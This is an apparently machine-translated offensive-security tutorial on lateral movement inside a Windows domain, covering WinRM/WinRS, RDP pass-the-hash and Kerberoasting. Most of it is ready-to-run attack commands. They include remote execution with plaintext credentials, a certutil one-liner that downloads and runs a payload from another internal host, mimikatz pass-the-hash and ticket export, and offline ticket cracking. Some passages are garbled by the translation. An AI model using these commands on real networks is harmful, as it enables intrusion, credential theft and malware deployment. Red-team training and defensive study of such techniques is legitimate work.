Article directory
Chapter content
IPC,WMI,SMB,PTH,PTK,PTT,SPN,WinRM,WinRS,RDP, Plink, DCOM, SSH; Exchange, LLMNR poisoning, Kerberos_TGS, GPO&DACL, domain control privilege escalation vulnerability, constrained delegation, database attack and defense, system patch delivery and execution, EDR targeted delivery and execution, etc.
Domain Lateral Movement - WinRM & WinRS - Cleartext & NTLM
Use WinRM service, use WinRS connection
WinRM, which stands for Windows Remote Management, is a service that allows administrators to perform system management tasks remotely.
Kerberos and NTLM authentication as well as Basic authentication are supported by default.
Mobile conditions: Winrm rs service enabled on both sides!
Administrator level credentials are required to use this service
Windows 2008 and above versions are in the automatic state by default, and Windows Vista/win7 must be manually started;
Windows 2012 and later versions allow remote arbitrary hosts to manage by default.
The attack aircraft is turned on:
winrm quickconfig -q
winrm set winrm/config/Client @{
TrustedHosts="*"}
1. Probes are available:
cs built-in port scan 5985
powershell Get-WmiObject -Class win32_service | Where-Object {
$_.name -like "WinRM"}
2. Connection execution:
winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 whoami
winrs -r:192.168.3.21 -u:192.168.3.21\administrator -p:Admin12345 whoami
3. Online CS&MSF:
winrs -r:192.168.3.32 -u:192.168.3.32\administrator -p:admin!@#45 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/webserver4444.exe webserver4444.exe & webserver4444.exe"
4.CS built-in mobile-plugin
Domain Lateral Movement - RDP - Cleartext & NTLM
Remote Desktop ServicesSupport plain text and HASH connection
Condition: The other party starts the RDP service Remote Desktop
RDP connection:
- Remotely connect directly on the currently controlled host (directly connect to sqlserver remotely on the webserver)
- Establish a node to connect (using a proxy tool)recommend
- Port forwarding (to forward the traffic of SQLserver port 3389 to webserver port 2222, upload tool is required)
1. Probe service:
cs built-in port scan 3389
tasklist /svc | find "TermService" # 找到对应服务进程的PID
netstat -ano | find "PID值" # 找到进程对应的端口号
portscan 192.168.3.0-192.168.3.255 3389 arp 1024
2. Probe connection:
CrackMapExec&MSF batch scan username and password verification
3. Connection execution:
Plain text connection:
mstsc /console /v:192.168.3.32 /admin
HASH connection:
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:administrator /domain:192.168.3.32 /ntlm:518b98ad4178a53695dc997aa02d455c "/run:mstsc /restrictedadmin" #mimikatz使用HASH连接
Domain Lateral Movement - Spn & Kerberos - Request & Crack & Rewrite
Kerberoasting attack utilization process:
• SPN service discovery
• Request service ticket (tool judgment and powershell script judgment)
• Export of service ticket (mimikatz export)
• Brute force cracking of service ticket (use password dictionary to crack RC4 protocol)
https://github.com/GhostPack/Rubeus
https://github.com/nidem/kerberoast
https://www.freebuf.com/articles/system/174967.html
To exploit the need to configure policy encryption (contrast)
a hacker can use a valid domain user's authentication ticket (TGT) to request a service ticket for one or more target services running on the server.
The DC looks up the SPN in Active Directory and encrypts the ticket with the service account associated with the SPN so the service can verify that the user has access.
The encryption type of the requested Kerberos service ticket is RC4_HMAC_MD5, which means that the service account's NTLM password hash is used to encrypt the service ticket.
The hacker cracks the received TGS ticket offline to obtain the HASH of the target service account. This is called a Kerberoast attack.
If we have an arbitrary SPN registered for a domain user account, then the NTLM hash of that user account's plaintext password is used to create the service ticket.
1. Scanning and the services opened by the environment host:
powershell setspn -T GOd.org -q */*
powershell setspn -T God.org -q */* | findstr "MSSQL"
2. Detect available protocols - tool: one-to-many request - automatic request to hosts in the domain
https://github.com/GhostPack/Rubeus
Rubeus kerberoast
3. Detect available protocols - manual: point-to-point request - generate a ticket file after the request
powershell Add-Type -AssemblyName System.IdentityModel
powershell New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/fileserv.god.org:1433"
mimikatz kerberos::ask /target:MSSQLSvc/fileserv.god.org:1433
4. Export:
mimikatz kerberos::list /export
5. Crack:
#Can only crack the RC4 encryption protocol, based on the pass.txt dictionary
python3 tgsrepcrack.py pass.txt "0-40e00000-webserver$@krbtgt~GOD.ORG-GOD.ORG.kirbi"